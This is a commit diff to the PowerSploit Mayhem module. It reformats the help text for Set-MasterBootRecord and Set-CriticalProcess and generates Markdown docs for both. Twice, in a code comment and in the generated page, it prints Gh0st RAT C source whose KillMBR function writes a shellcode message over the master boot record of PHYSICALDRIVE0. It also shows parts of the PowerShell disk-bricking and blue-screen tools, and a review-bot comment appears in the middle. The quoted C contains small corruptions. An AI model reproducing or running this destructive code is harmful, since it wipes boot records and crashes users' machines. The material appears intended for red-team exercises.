For ./Mayhem/ :

-PSScriptAnalyzering
    -Tweaking of synopsis blocks in order to support platyPS
    -Code standardization
    -Generated docs
HarmJ0y 2016-12-14 18:05:22 -05:00
parent 1980f403ee
commit a81faf36a4
4 changed files with 390 additions and 92 deletions


@ -3,109 +3,109 @@ function Set-MasterBootRecord
<# <#
.SYNOPSIS .SYNOPSIS
Proof of concept code that overwrites the master boot record with the Proof of concept code that overwrites the master boot record with the
message of your choice. message of your choice.
PowerSploit Function: Set-MasterBootRecord
Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
PowerSploit Function: Set-MasterBootRecord
Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
.DESCRIPTION .DESCRIPTION
Set-MasterBootRecord is proof of concept code designed to show that it is Set-MasterBootRecord is proof of concept code designed to show that it is
possible with PowerShell to overwrite the MBR. This technique was taken possible with PowerShell to overwrite the MBR. This technique was taken
from a public malware sample. This script is inteded solely as proof of from a public malware sample. This script is inteded solely as proof of
concept code. concept code.
.PARAMETER BootMessage .PARAMETER BootMessage
Specifies the message that will be displayed upon making your computer a brick. Specifies the message that will be displayed upon making your computer a brick.
.PARAMETER RebootImmediately .PARAMETER RebootImmediately
Reboot the machine immediately upon overwriting the MBR. Reboot the machine immediately upon overwriting the MBR.
.PARAMETER Force .PARAMETER Force
Suppress the warning prompt. Suppress the warning prompt.
.EXAMPLE .EXAMPLE
Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC' Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
.NOTES .NOTES
Obviously, this will only work if you have a master boot record to Obviously, this will only work if you have a master boot record to
overwrite. This won't work if you have a GPT (GUID partition table) overwrite. This won't work if you have a GPT (GUID partition table).
#>
<#
This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us): This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
// CGh0stApp message handlers // CGh0stApp message handlers
unsigned char scode[] = unsigned char scode[] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c" "\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72" "\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29"; "\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
int CGh0stApp::KillMBR() int CGh0stApp::KillMBR()
{ {
HANDLE hDevice; HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned; DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR[512] = {0}; BYTE pMBR[512] = {0};
// ????MBR // ????MBR
memcpy(pMBR, scode, sizeof(scode) - 1); memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR[510] = 0x55; pMBR[510] = 0x55;
pMBR[511] = 0xAA; pMBR[511] = 0xAA;
hDevice = CreateFile hDevice = CreateFile
( (
"\\\\.\\PHYSICALDRIVE0", "\\\\.\\PHYSICALDRIVE0",
GENERIC_READ | GENERIC_WRITE, GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL, NULL,
OPEN_EXISTING, OPEN_EXISTING,
0, 0,
NULL NULL
); );
if (hDevice == INVALID_HANDLE_VALUE) if (hDevice == INVALID_HANDLE_VALUE)
return -1; return -1;
DeviceIoControl DeviceIoControl
( (
hDevice, hDevice,
FSCTL_LOCK_VOLUME, FSCTL_LOCK_VOLUME,
NULL, NULL,
0, 0,
NULL, NULL,
0, 0,
&dwBytesReturned, &dwBytesReturned,
NULL NUL
); )
// ?????? // ??????
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL); WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl DeviceIoControl
( (
hDevice, hDevice,
FSCTL_UNLOCK_VOLUME, FSCTL_UNLOCK_VOLUME,
NULL, NULL,
0, 0,
NULL, NULL,
0, 0,
&dwBytesReturned, &dwBytesReturned,
NULL NULL
); );
CloseHandle(hDevice); CloseHandle(hDevice);
ExitProcess(-1); ExitProcess(-1);
return 0; return 0;
} }
#> #>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '')]
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
Param (
[ValidateLength(1, 479)] [ValidateLength(1, 479)]
[String] [String]
$BootMessage = 'Stop-Crying; Get-NewHardDrive', $BootMessage = 'Stop-Crying; Get-NewHardDrive',
@ -220,7 +220,7 @@ int CGh0stApp::KillMBR()
$MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize) $MBRBytes = [Runtime.InteropServices.Marshal]::AllocHGlobal($MBRSize)
# Zero-initialize the allocated unmanaged memory # Zero-initialize the allocated unmanaged memory
0..511 | % { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) } 0..511 | ForEach-Object { [Runtime.InteropServices.Marshal]::WriteByte([IntPtr]::Add($MBRBytes, $_), 0) }
[Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length) [Runtime.InteropServices.Marshal]::Copy($MBRInfectionCode, 0, $MBRBytes, $MBRInfectionCode.Length)
@ -272,11 +272,11 @@ function Set-CriticalProcess
Causes your machine to blue screen upon exiting PowerShell. Causes your machine to blue screen upon exiting PowerShell.
PowerSploit Function: Set-CriticalProcess PowerSploit Function: Set-CriticalProcess
Author: Matthew Graeber (@mattifestation) Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause License: BSD 3-Clause
Required Dependencies: None Required Dependencies: None
Optional Dependencies: None Optional Dependencies: None
.PARAMETER ExitImmediately .PARAMETER ExitImmediately
@ -300,7 +300,9 @@ Set-CriticalProcess -Force -Verbose
#> #>
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')] Param ( [Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSUseDeclaredVarsMoreThanAssignments', '')]
[CmdletBinding(SupportsShouldProcess = $True, ConfirmImpact = 'High')]
Param (
[Switch] [Switch]
$Force, $Force,
@ -319,7 +321,7 @@ Set-CriticalProcess -Force -Verbose
{ {
$Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.') $Response = $psCmdlet.ShouldContinue('Have you saved all your work?', 'The machine will blue screen when you exit PowerShell.')
} }
if (!$Response) if (!$Response)
{ {
return return
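Review bot: The two new PSScriptAnalyzer suppressions (`PSAvoidUsingWMICmdlet` ahead of Set-MasterBootRecord's Param block and `PSUseDeclaredVarsMoreThanAssignments` ahead of Set-CriticalProcess's) carry an empty second argument and no `Justification`, so a later reader cannot tell whether the findings were assessed or simply silenced; the attribute takes a named property, e.g. `[Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidUsingWMICmdlet', '', Justification = '<PLACEHOLDER: why WMI is required here>')]`. For the second suppression the flagged variable is not in the hunk, so it may be worth confirming it is not a dead assignment before suppressing the rule. The Set-CriticalProcess help block in the -272 hunk goes from the synopsis metadata straight to `.PARAMETER ExitImmediately` with no `.DESCRIPTION`, which is presumably why the generated Set-CriticalProcess.md still shows `{{Fill in the Description}}`. The Set-MasterBootRecord description also keeps the typo `inteded` (should be `intended`), which platyPS has copied into the generated page. Both functions' bodies continue outside these hunks.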


@ -0,0 +1,108 @@
# Set-CriticalProcess
## SYNOPSIS
Causes your machine to blue screen upon exiting PowerShell.
PowerSploit Function: Set-CriticalProcess
Author: Matthew Graeber (@mattifestation)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
## SYNTAX
```
Set-CriticalProcess [-Force] [-ExitImmediately] [-WhatIf] [-Confirm]
```
## DESCRIPTION
{{Fill in the Description}}
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Set-CriticalProcess
```
### -------------------------- EXAMPLE 2 --------------------------
```
Set-CriticalProcess -ExitImmediately
```
### -------------------------- EXAMPLE 3 --------------------------
```
Set-CriticalProcess -Force -Verbose
```
## PARAMETERS
### -Force
Set the running PowerShell process as critical without asking for confirmation.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -ExitImmediately
Immediately exit PowerShell after successfully marking the process as critical.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -WhatIf
Shows what would happen if the cmdlet runs.
The cmdlet is not run.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: wi
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -Confirm
Prompts you for confirmation before running the cmdlet.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: cf
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
## NOTES
## RELATED LINKS


@ -0,0 +1,184 @@
# Set-MasterBootRecord
## SYNOPSIS
Proof of concept code that overwrites the master boot record with the
message of your choice.
PowerSploit Function: Set-MasterBootRecord
Author: Matthew Graeber (@mattifestation) and Chris Campbell (@obscuresec)
License: BSD 3-Clause
Required Dependencies: None
Optional Dependencies: None
## SYNTAX
```
Set-MasterBootRecord [[-BootMessage] <String>] [-RebootImmediately] [-Force] [-WhatIf] [-Confirm]
```
## DESCRIPTION
Set-MasterBootRecord is proof of concept code designed to show that it is
possible with PowerShell to overwrite the MBR.
This technique was taken
from a public malware sample.
This script is inteded solely as proof of
concept code.
## EXAMPLES
### -------------------------- EXAMPLE 1 --------------------------
```
Set-MasterBootRecord -BootMessage 'This is what happens when you fail to defend your network. #CCDC'
```
## PARAMETERS
### -BootMessage
Specifies the message that will be displayed upon making your computer a brick.
```yaml
Type: String
Parameter Sets: (All)
Aliases:
Required: False
Position: 1
Default value: Stop-Crying; Get-NewHardDrive
Accept pipeline input: False
Accept wildcard characters: False
```
### -RebootImmediately
Reboot the machine immediately upon overwriting the MBR.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -Force
Suppress the warning prompt.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases:
Required: False
Position: Named
Default value: False
Accept pipeline input: False
Accept wildcard characters: False
```
### -WhatIf
Shows what would happen if the cmdlet runs.
The cmdlet is not run.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: wi
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
### -Confirm
Prompts you for confirmation before running the cmdlet.
```yaml
Type: SwitchParameter
Parameter Sets: (All)
Aliases: cf
Required: False
Position: Named
Default value: None
Accept pipeline input: False
Accept wildcard characters: False
```
## INPUTS
## OUTPUTS
## NOTES
Obviously, this will only work if you have a master boot record to
overwrite.
This won't work if you have a GPT (GUID partition table).
This code was inspired by the Gh0st RAT source code seen here (acquired from: http://webcache.googleusercontent.com/search?q=cache:60uUuXfQF6oJ:read.pudn.com/downloads116/sourcecode/hack/trojan/494574/gh0st3.6_%25E6%25BA%2590%25E4%25BB%25A3%25E7%25A0%2581/gh0st/gh0st.cpp__.htm+&cd=3&hl=en&ct=clnk&gl=us):
// CGh0stApp message handlers
unsigned char scode\[\] =
"\xb8\x12\x00\xcd\x10\xbd\x18\x7c\xb9\x18\x00\xb8\x01\x13\xbb\x0c"
"\x00\xba\x1d\x0e\xcd\x10\xe2\xfe\x49\x20\x61\x6d\x20\x76\x69\x72"
"\x75\x73\x21\x20\x46\x75\x63\x6b\x20\x79\x6f\x75\x20\x3a\x2d\x29";
int CGh0stApp::KillMBR()
{
HANDLE hDevice;
DWORD dwBytesWritten, dwBytesReturned;
BYTE pMBR\[512\] = {0};
// ????MBR
memcpy(pMBR, scode, sizeof(scode) - 1);
pMBR\[510\] = 0x55;
pMBR\[511\] = 0xAA;
hDevice = CreateFile
(
"\\\\\\\\.\\\\PHYSICALDRIVE0",
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_EXISTING,
0,
NULL
);
if (hDevice == INVALID_HANDLE_VALUE)
return -1;
DeviceIoControl
(
hDevice,
FSCTL_LOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NUL
)
// ??????
WriteFile(hDevice, pMBR, sizeof(pMBR), &dwBytesWritten, NULL);
DeviceIoControl
(
hDevice,
FSCTL_UNLOCK_VOLUME,
NULL,
0,
NULL,
0,
&dwBytesReturned,
NULL
);
CloseHandle(hDevice);
ExitProcess(-1);
return 0;
}
## RELATED LINKS


@ -124,7 +124,11 @@ pages:
- Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md' - Find-AVSignature: 'AntivirusBypass/Find-AVSignature.md'
- CodeExecution: - CodeExecution:
- Functions: - Functions:
- Find-AVSignature: 'CodeExecution/Invoke-DllInjection.md' - Invoke-DllInjection: 'CodeExecution/Invoke-DllInjection.md'
- Find-AVSignature: 'CodeExecution/Invoke-ReflectivePEInjection.md' - Invoke-ReflectivePEInjection: 'CodeExecution/Invoke-ReflectivePEInjection.md'
- Find-AVSignature: 'CodeExecution/Invoke-Shellcode.md' - Invoke-Shellcode: 'CodeExecution/Invoke-Shellcode.md'
- Find-AVSignature: 'CodeExecution/Invoke-WmiCommand.md' - Invoke-WmiCommand: 'CodeExecution/Invoke-WmiCommand.md'
- Mayhem:
- Functions:
- Set-MasterBootRecord: 'Mayhem/Set-MasterBootRecord.md'
- Set-CriticalProcess: 'Mayhem/Set-CriticalProcess.md'